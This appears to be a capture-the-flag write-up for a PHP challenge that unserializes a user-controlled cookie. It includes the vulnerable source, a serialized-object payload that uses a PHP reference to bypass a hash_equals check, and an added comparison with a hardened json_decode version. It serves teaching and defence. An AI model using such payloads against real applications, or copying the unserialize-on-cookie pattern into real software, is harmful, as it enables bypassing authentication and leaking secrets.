source.php
<?php
include "flag.php";
if (isset ($_POST['obj'])) {
setcookie ('obj', $_POST['obj']);
} elseif (!isset ($_COOKIE['obj'])) {
$obj = new stdClass;
$obj->input = 1234;
setcookie ('obj', serialize ($obj));
}
?>
<!DOCTYPE html>
<html>
<head>
<title>#WebSec Level Eighteen</title>
<link rel="stylesheet" href="../static/bootstrap.min.css" />
</head>
<body>
<div id="main">
<div class="container">
<div class="row">
<h1>Level Eighteen <small> - json_decode is for the weak</small></h1>
</div>
<div class="row">
<p class="lead">
Let's pretend that we gave you a serialized object before ; can you give it back please?<br>
This fine level was created by <mark>nurfed</mark>.
You can check the sources <a href="source.php">here</a>.
</p>
</div>
</div>
<div class="container">
<div class="row">
<form class="form-inline" method='post'>
<input name='flag' class='form-control' type='text' placeholder='Guessed flag'>
<input class="form-control btn btn-default" name="submit" value='Go' type='submit'>
</form>
</div>
</div>
<?php if (isset ($_COOKIE['obj'])): ?>
<br>
<div class="container">
<div class="row">
<?php
$obj = $_COOKIE['obj'];
$unserialized_obj = unserialize ($obj);
$unserialized_obj->flag = $flag;
if (hash_equals ($unserialized_obj->input, $unserialized_obj->flag))
echo '<div class="alert alert-success">Here is your flag: <mark>' . $flag . '</mark>.</div>';
else
echo '<div class="alert alert-danger"><code>' . htmlentities($obj) . '</code> is an invalid object, sorry.</div>';
?>
</div>
</div>
<?php endif ?>
</div>
</body>
</html>
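The check passes when the input field of the unserialized object equals the flag value that is written over the object after unserialize. Build serialized data in which input is set as a reference to the flag field and send it.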
payload
O:8:"stdClass":2:{s:4:"flag";s:3:"123";s:5:"input";R:2;}
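Why the reference makes the comparison pass, next to a check that does not have the problem. This is an added example, not part of the original post or the challenge source: `$flag` is a constructed placeholder, and the function names `check_unserialize` and `check_json` are hypothetical.

```php
<?php
// Constructed stand-in for the secret that flag.php defines in the challenge.
$flag = 'CONSTRUCTED-PLACEHOLDER-FLAG';

// The serialized string from the write-up: "input" is R:2, a reference to
// value slot 2 (slot 1 is the object itself, slot 2 is the "flag" property).
$cookie = 'O:8:"stdClass":2:{s:4:"flag";s:3:"123";s:5:"input";R:2;}';

// Pattern used by source.php: unserialize() the cookie, then store the
// secret inside the object the client described.
function check_unserialize(string $cookie, string $flag): bool
{
    $o = unserialize($cookie);
    if (!is_object($o)) {
        return false;
    }
    // "flag" and "input" share one value, so this write changes both.
    $o->flag = $flag;
    return is_string($o->input) && hash_equals($o->input, $o->flag);
}

// Hardened pattern (hypothetical): JSON has no reference syntax, and the
// secret is never written into the client-supplied structure.
function check_json(string $cookie, string $flag): bool
{
    $data = json_decode($cookie, true);
    if (!is_array($data) || !isset($data['input']) || !is_string($data['input'])) {
        return false;
    }
    // Known value first, client value second.
    return hash_equals($flag, $data['input']);
}

// The reference payload against the original pattern.
var_dump(check_unserialize($cookie, $flag));
// The same string is not valid JSON, so the hardened check rejects it.
var_dump(check_json($cookie, $flag));
// A JSON object with equal "flag" and "input" does not help either:
// the comparison is against the server-side secret only.
var_dump(check_json('{"flag":"123","input":"123"}', $flag));
// Only a caller who already knows the secret passes.
var_dump(check_json(json_encode(['input' => $flag]), $flag));
```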